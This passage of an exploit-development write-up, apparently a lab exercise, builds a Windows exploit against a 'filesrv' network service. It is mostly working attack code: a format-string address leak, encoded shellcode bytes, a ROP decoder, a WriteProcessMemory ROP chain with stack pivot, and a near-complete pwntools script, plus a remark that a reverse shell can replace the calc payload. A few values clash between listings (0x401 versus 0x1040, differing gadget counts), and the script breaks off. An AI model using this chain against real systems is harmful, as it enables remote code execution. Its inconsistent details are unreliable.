sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

As you can see we did not use any encoder since we will be doing that ourselves. Before we send anything, we do our custom encoding, and since there are not that many bad chars I decided to subtract 0x55 from every bad character. The bad characters are all rather small, so subtracting a value like 0x55 (modulo 256) brings them to byte values that should be safe. If you have more bad characters you could also use an individual offset for every character or substitution tables.

We iterate over the shellcode and identify the indices of all bad characters. Then we subtract the offset (here 0x55) from all bad chars so they become “safe”, e.g.: 0x20 - 0x55 = 0xcb.

def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacements: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)
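
Before building the ROP side it is worth checking the encoding offline. The sketch below is a compact, standalone variant of the two functions above (not a drop-in replacement) that also checks whether any replacement byte is itself a bad character.

```python
BAD = bytes.fromhex("000102030405060708090a0b0c0d202f5c")
KEY = 0x55

def encode(sc):
    """Subtract KEY (mod 256) from every bad byte, remember where that happened."""
    indices = [i for i, b in enumerate(sc) if b in BAD]
    out = bytearray(sc)
    for i in indices:
        out[i] = (out[i] - KEY) & 0xFF
    return bytes(out), indices

def decode(encoded, indices):
    """Reference decoder: add KEY back at the recorded positions."""
    out = bytearray(encoded)
    for i in indices:
        out[i] = (out[i] + KEY) & 0xFF
    return bytes(out)

def unsafe_replacements():
    """Bad bytes whose encoded form is again a bad byte."""
    return [b for b in BAD if ((b - KEY) & 0xFF) in BAD]

sample = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"  # start of the payload above
encoded, indices = encode(sample)
print(encoded.hex(), indices, [hex(b) for b in unsafe_replacements()])
```

With the key 0x55 there is one collision: 0x5c becomes 0x07, which is on the bad list again. The calc payload above does not contain a 0x5c byte so it is not affected, but a different payload might need another key.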

With our shellcode encoded, we now have to start building the ROP decoder that will undo our changes to the shellcode:

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)   # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
	rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

First we get a copy of esp into ecx. Then we load eax with 0x522 and increment it – the point here is to get the offset from the stack pointer to our shellcode (since the ROP decoder needs to start decoding exactly at the start of our shellcode). After the first part is done, eax holds the start address of our shellcode as required.

We then loop over all indices of bad chars in our shellcode, advancing eax so it always points to the next bad char. We then increment the byte value at that location by 0x55, reversing the encoding operation. Note that this adds 7*4=28 bytes for every bad char and we don’t have much more than 1000 bytes for this ROP decoder, which means that we are limited in the number of bad chars we can handle (about 30).
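
The “about 30” figure can be reproduced with a quick back-of-the-envelope calculation. The sketch below is only an illustration: the dword counts are read off the exploit listing in this post (7 skeleton entries, 24 leading ropnops, 14 dwords of decoder setup, 7 dwords per bad character, 1 dword for the gadget that jumps over the pivot), and the constant and function names are hypothetical.

```python
DWORD = 4

OFFSET_TO_PIVOT = 1032        # `offset` in the exploit: bytes before the pivot slot
SKELETON_DWORDS = 7           # WriteProcessMemory call skeleton
LEADING_ROPNOPS = 24          # ropnops placed after the skeleton
DECODER_SETUP_DWORDS = 14     # part 1 of rop_decoder(), including its 4 ropnops
PER_BADCHAR_DWORDS = 7        # part 2 of rop_decoder(), emitted once per bad char
JUMP_GADGET_DWORDS = 1        # add esp, 0x10; ret


def decoder_size(bad_chars: int) -> int:
    """Size in bytes of the ROP decoder for a given number of bad characters."""
    return (DECODER_SETUP_DWORDS + PER_BADCHAR_DWORDS * bad_chars) * DWORD


def max_bad_chars() -> int:
    """Largest number of bad characters whose decoder still fits before the pivot."""
    fixed = (SKELETON_DWORDS + LEADING_ROPNOPS
             + DECODER_SETUP_DWORDS + JUMP_GADGET_DWORDS) * DWORD
    return (OFFSET_TO_PIVOT - fixed) // (PER_BADCHAR_DWORDS * DWORD)


if __name__ == "__main__":
    n = max_bad_chars()
    print(f"decoder fits up to {n} bad chars ({decoder_size(n)} bytes)")
```

Reducing the number of leading ropnops would free a little more room, at the cost of a less forgiving stack pivot.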

Before moving on, let’s observe once how the decoder modifies a bad char:

filesrv+0x7f17a:
3fb2f17a 0008            add     byte ptr [eax],cl          ds:002b:00c1fd60=cb
0:001> r eax
eax=00c1fd60 <- Write Target
0:001> r ecx
ecx=11111155 <- Low Byte is Write Value

0:001> dd eax
00c1fd60  64db31cb <- 0x20 - 0x55 = 0xcb
0:001> p
0:001> dd eax
00c1fd60  64db3120 <- 0xcb + 0x55 = 0x20

This shows that we can successfully decode our shellcode bad chars.
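
To make the effect of this gadget easier to follow, here is a small Python model of `add byte ptr [eax], cl; add cl, cl; ret`. It is a sketch for illustration only (the function name and the bytearray standing in for memory are assumptions), using the values from the WinDBG output above. Only the low byte of ecx is added, and the gadget doubles cl as a side effect, which is why the decoder reloads ecx before every write. The upper bytes of 0x11111155 are presumably just padding that keeps null bytes out of the payload.

```python
def add_byte_ptr_eax_cl(mem: bytearray, eax: int, ecx: int) -> int:
    """Model of `add byte ptr [eax], cl; add cl, cl`. Returns the new ecx."""
    cl = ecx & 0xff
    mem[eax] = (mem[eax] + cl) & 0xff   # 8-bit add, wraps around at 256
    cl = (cl + cl) & 0xff               # side effect: cl is doubled
    return (ecx & 0xffffff00) | cl


if __name__ == "__main__":
    # The dword 0x64db31cb as it sits in memory (little endian).
    mem = bytearray((0x64db31cb).to_bytes(4, "little"))
    new_ecx = add_byte_ptr_eax_cl(mem, 0, 0x11111155)
    print(hex(int.from_bytes(mem, "little")), hex(new_ecx))
```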

Working with Skeletons

Now it’s time to replace the dummy values for the call to WriteProcessMemory we placed on the very top of our buffer on the stack. We don’t have much room after our rop decoder & before our stack pivot gadget – so we will fill up with ropnops (just ret instructions) and jump over our gadget as follows:

rop1 = b""
# add skeleton
for g in skeleton:
      rop1 += p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop1)-4, 4):
      rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += b"D" * (size-len(buf))
p.sendline(buf)

0:003> dd esp L100
...
0112f710  3fab159d 3fab159d 3fab159d 3fab159d
0112f720  3faeda53 3fac1396 3fac1396 44444444 <- Jump over SEH entry
0112f730  44444444 44444444 44444444 44444444
0:003> ba e1 filesrv+0x3da53
0:003> g
filesrv+0x3da53:
3faeda53 83c410          add     esp,10h
0:003> dd esp
018ff820  3fac1396 3fac1396 44444444 44444444

This leaves us now in the “big” area of our payload where we can write the rop chain to modify the skeleton & also have our shellcode. Our first task is to align a register (here ecx) with our skeleton.

0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
writeable,
0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
0x704F4 + binary_base,  # pop eax; ret;
0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7609f + binary_base,  # add eax, 4; ret;
0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
0x41414141,
0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
0x41414141,

WinDBG shows that ecx is now indeed aligned with our skeleton:

0:001> dd ecx
009df688  41414141 3fab1010 ffffffff 3fab1010
009df698  42424242 43434343 3fb5635a 3fab159d

Now that we have a pointer to the skeleton, we can proceed to replace the dummy values. The first one (where we placed As) is the address of WriteProcessMemory. We do not have a kernel32 leak, so we have to find another way to get its address. If we look at the binary’s Import Address Table (IAT), we can see that it imports quite a few functions but none of them is WriteProcessMemory:

This is unfortunate, but we can use another function from kernel32 and calculate the offset to WriteProcessMemory from that address. The only downside is that we lose some portability, as we would have to know the target’s Windows version and patch level or need a copy of its kernel32.dll. We can use WinDBG to get the offset:

0:003> ? kernel32!writeprocessmemorystub - kernel32!writefile
Evaluate expression: 72848 = 00011c90

Now we can extend our ropchain to dereference the IAT entry of WriteFile, add the offset & then write this value to our skeleton:

0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax]
0x636a2 + binary_base,  # pop edx; ret;
0xfffee370,             # -00011c90, offset from WriteFile to WriteProcessMemory
0x59a05 + binary_base,  # sub eax, edx; pop ebp; ret;
0x41414141,
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
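
The chain subtracts 0xfffee370 instead of adding 0x11c90 because the positive offset would put bad characters (0x00 and 0x01) on the stack. A short sketch of that two's-complement trick follows; it is an illustration, not the author's code. The helper names are hypothetical, and the WriteFile address is back-computed from the WriteProcessMemoryStub address visible in the debugger output of this post rather than taken from a real leak.

```python
import struct

BADCHARS = bytes([*range(0x00, 0x0e), 0x20, 0x2f, 0x5c])


def neg32(value: int) -> int:
    """Two's-complement negation in 32 bits."""
    return (-value) & 0xffffffff


def sub32(a: int, b: int) -> int:
    """What `sub eax, edx` computes on a 32-bit register."""
    return (a - b) & 0xffffffff


def has_bad_bytes(dword: int) -> bool:
    """True if the little-endian encoding of dword contains a bad character."""
    return any(b in BADCHARS for b in struct.pack("<I", dword))


DELTA = 0x11c90                    # WriteProcessMemoryStub - WriteFile (from WinDBG)
NEG_DELTA = neg32(DELTA)           # the value actually placed in the chain

if __name__ == "__main__":
    writefile = 0x76c45240 - DELTA             # assumption: derived, not leaked
    wpm = sub32(writefile, NEG_DELTA)          # subtracting -DELTA adds DELTA
    print(hex(NEG_DELTA), has_bad_bytes(DELTA), has_bad_bytes(NEG_DELTA), hex(wpm))
```

The same idea is used in the decoder loop, where the distance to the next bad char is negated before it is subtracted from eax.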

We can confirm in WinDBG that the value has been written:

filesrv+0x7ab35:
3fb2ab35 8901            mov     dword ptr [ecx],eax  ds:002b:019bf370=41414141
0:003> dd ecx
019bf370  41414141 3fab1010 ffffffff 3fab1010
0:003> p
3fb2ab37 5d              pop     ebp
0:003> dd ecx
019bf370  76c45240 3fab1010 ffffffff 3fab1010

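Now we move the skeleton pointer ahead to point to the next value we want to replace. Note that the preceding gadget ends in pop ebp; ret and is not followed by a filler dword, so the first entry below is consumed by that pop ebp and only 16 of the 17 inc ecx gadgets actually execute: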

0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 4
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 8
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 12
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0;
0x0582b + binary_base, # inc ecx; ret 0; 16
0x0582b + binary_base, # inc ecx; ret 0;

The next value we want to write is the shellcode address on the stack; this is the source of the copy operation that WriteProcessMemory will perform. To get a pointer to our shellcode, we have to look in the debugger at how far the start of the shellcode is from the current esp at this point. In this case, the following gadgets move eax exactly to the start of the shellcode and write it to where ecx points (which is still the next skeleton value to overwrite):

0x16238 + binary_base, # mov eax, ecx; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x62646 + binary_base, # add eax, 0x7f; ret;
0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
0x41414141,
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x76096 + binary_base, # add eax, 8; ret;
0x7ab35 + binary_base, # mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf380  019bf915 43434343 3fb5635a 3fab159d
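
The gadget sequence above is simply a way of composing one constant out of the few `add`/`sub` immediates that are available. As a quick sanity check, here is the arithmetic as a sketch; the variable names are made up, and the addresses are the ones from the debugger output above.

```python
# Immediates of the available gadgets and how often the snippet above uses them.
steps = [0x7f] * 11 + [-0x30] + [0x08] * 10

delta = sum(steps)                      # total distance added to eax
skeleton_slot = 0x019bf380              # ecx at the time of `mov eax, ecx`
shellcode_ptr = (skeleton_slot + delta) & 0xffffffff

if __name__ == "__main__":
    print(hex(delta), hex(shellcode_ptr))
```

If the second ROP chain changes in length, the distance changes with it and the mix of gadgets has to be adjusted accordingly.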

The next value we have to replace is the size. We have to choose a value that is large enough for our shellcode but not so big that it causes issues. The following ROP gadgets once again move the skeleton pointer ahead and place the value of 0x401 as the size, which is enough to hold our shellcode.

# Write size (0x401) to skeleton dummy value
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x0582b + binary_base,  # inc ecx; ret 0;
0x704F4 + binary_base,  # pop eax
0x19b3  + binary_base,  # addr of 0x401;
0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
0x41414141,

Confirm:

0:003> dd ecx
019bf384  00001040  3fb5635a 3fab159d 3fab159d

At this point, the only thing left to do is to align ecx with the start of our skeleton again (we increased it for every dummy value replacement) and then pivot the stack exactly to the skeleton:

0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x15935 + binary_base,  # dec ecx; ret;
0x8b299 + binary_base,  # mov esp, ecx; ret;
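
Keeping track of where ecx points across these runs of inc/dec gadgets is easy to get wrong, especially because `mov dword ptr [ecx], eax; pop ebp; ret;` swallows the dword that follows it. The sketch below is a simplified model of the second chain, not a real emulator: gadgets that do not touch ecx are left out and the labels "store", "inc", "dec" and "filler" are hypothetical. It walks the chain and records the skeleton offset at which each write happens.

```python
def walk(chain):
    """Return (offsets of the stores relative to the skeleton, final ecx offset)."""
    ecx = 0
    stores = []
    i = 0
    while i < len(chain):
        gadget = chain[i]
        if gadget == "store":
            stores.append(ecx)
            i += 2          # skip the dword consumed by the gadget's pop ebp
            continue
        if gadget == "inc":
            ecx += 1
        elif gadget == "dec":
            ecx -= 1
        i += 1
    return stores, ecx


# Order of ecx-relevant entries as they appear in the listings of this post.
chain = (["store"] + ["inc"] * 17          # first inc is eaten by pop ebp
         + ["store", "filler"] + ["inc"] * 4
         + ["store", "filler"] + ["dec"] * 20)

if __name__ == "__main__":
    stores, final = walk(chain)
    print(stores, final)
```

The three writes land on skeleton offsets 0, 16 and 20 (function address, lpBuffer, nSize), and ecx is back at the start of the skeleton when `mov esp, ecx` executes.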

When we break on this last stack pivot gadget, we can see that we indeed return into WriteProcessMemory! Note that directly after this address we placed the address of the codecave, which means that we will return into the shellcode after WriteProcessMemory is done. We confirm in WinDBG that we can step through the nops in our shellcode after returning from the function:

filesrv+0x8b29b:
3fb3b29b c3              ret
0:003> p
KERNEL32!WriteProcessMemoryStub:
76c45240 8bff            mov     edi,edi
0:003> pt
KERNELBASE!WriteProcessMemory+0x7e:
76b19dfe c21400          ret     14h
0:003> p
filesrv+0x1010:
3fab1010 90              nop
filesrv+0x1011:
3fab1011 90              nop
...

This indeed worked. If we now let execution continue we get our calc:

To get a reverse shell, we can replace the shellcode, but it must still contain no more than about 30 bad characters. This can be a bit tricky when using msfvenom but is not difficult to achieve with custom shellcode that is already null-byte free (so the ROP decoder does not have to fix those bytes).

Finally here is the complete exploit:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x30
sc += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
sc += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
sc += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
sc += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
sc += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
sc += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
sc += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
sc += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
sc += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
sc += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
sc += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
sc += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
sc += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
sc += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
sc += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

def rop_decoder():
	rop = b""

	# 1) Align eax register with shellcode
	rop += p32(0x4CBFB + binary_base)  # pop eax 
	rop += p32(writeable)
	rop += p32(0x683da + binary_base)  	# push esp ; add dword [eax], eax ; pop ecx; ret;  
	rop += p32(0x704F4 + binary_base)  	# pop eax; ret; 
	rop += p32(0x116ea + binary_base)  	# 0x522 this offset to the shellcode depends on how long the 2nd rop chain is
	rop += p32(0x2bb8e + binary_base)  	# mov eax, dword ptr [eax]; ret;
	rop += p32(0x37958 + binary_base) 	# add eax, 2; sub edx, 2; pop ebp; ret;
	rop += p32(0x41414141)
	rop += p32(0x17781 + binary_base) 	# add eax, ecx; pop ebp; ret 4;
	rop += p32(0x41414141) 
	rop += p32(binary_base + 0x159d)*(4) # ropnop

	# 2) Iterate over every bad char & add offset to all of them      
	offset = 0
	neg_offset = (-offset) & 0xffffffff
	value = 0x11111155 

	for i in range(len(bad_indices)):
		# get the offset from last bad char to this one - so we only iterate over bad chars and not over every single byte
		if i == 0:
			  offset = bad_indices[i]
		else:
			  offset = bad_indices[i] - bad_indices[i-1]
		neg_offset = (-offset) & 0xffffffff

		# get offset to next bad char into ecx
		rop += p32(0x0102e + binary_base)   # pop ecx; ret;
		rop += p32(neg_offset)

		# adjust eax by this offset to point to next bad char
		rop += p32(0x3ec4c + binary_base)   # sub eax, ecx; pop ebp; ret;
		rop += p32(0x41414141)
		rop += p32(0x102e + binary_base)    # pop ecx; ret;
		rop += p32(value)
		rop += p32(0x7f17a + binary_base)   # add byte ptr [eax], cl; add cl, cl; ret;
		print(f"({i}: {len(rop)})")
	return rop

# since this is writeprocessmemory, we will have to encode the shellcode & decode it via rop
def map_bad_chars(sc):
	badchars = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C"
	i = 0
	indices = []
	while i < len(sc):
		for c in badchars:
			if sc[i] == c:
				indices.append(i)
		i+=1
	return indices
bad_indices = map_bad_chars(sc)

def encode_shellcode(sc):
	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			  new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacements: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)
print(f"Amount of bad chars in sc: {len(bad_indices)}")

pivot = p32(binary_base + 0x11396)  # add esp,0xD60  
writeable = 0xa635a + binary_base
codecave =  0x1010 + binary_base

skeleton = [
	0x41414141, # WriteProcessMemory address (IAT WriteFile + offset)
	codecave,   # Shellcode Return Address
	0xffffffff, # Pseudo process handle to current process (-1)
	codecave,   # Code cave address (write where)
	0x42424242, # dummy lpBuffer (write what) 
	0x43434343, # dummy nSize
	writeable,  # lpNumberOfBytesWritten
]

rop_setup = [
	# Get a pointer to the skeleton
	0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
	writeable,
	0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
	0x704F4 + binary_base,  # pop eax; ret;
	0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7609f + binary_base,  # add eax, 4; ret;
	0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
	0x41414141,
	0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
	0x41414141,

	# Write WriteProcessMemory address to skeleton+0
	0x704F4 + binary_base,	# pop eax; ret;
	0x9015C + binary_base,	# IAT WriteFile
	0x2BB8E + binary_base,  # mov eax, dword ptr [eax] // dereference IAT to get lib ptr
	0x636a2 + binary_base, 	# pop edx; ret;
	0xfffee370, 			# -00011c90, offset from WriteFile to WriteProcessMemory
	0x59a05 + binary_base, 	# sub eax, edx; pop ebp; ret;
	0x41414141,
	0x7ab35 + binary_base, 	# mov dword ptr [ecx], eax; pop ebp; ret;

	# Move skeleton pointer ahead 
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 4
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 8
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 12
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 16
	0x0582b + binary_base, # inc ecx; ret 0;

	# Write shellcode address to skeleton dummy value
	0x16238 + binary_base, # mov eax, ecx; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
	0x41414141,
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x7ab35 + binary_base, # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	# Write size (0x401) to skeleton dummy value
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x704F4 + binary_base,  # pop eax
	0x19b3  + binary_base,  # addr of 0x401;
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	 # Move ecx back to skeleton & pivot stack there to execute the function
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x8b299 + binary_base, 	# mov esp, ecx; ret;
]

rop1 = b""
# add skeleton
for g in skeleton:
	  rop1 += p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
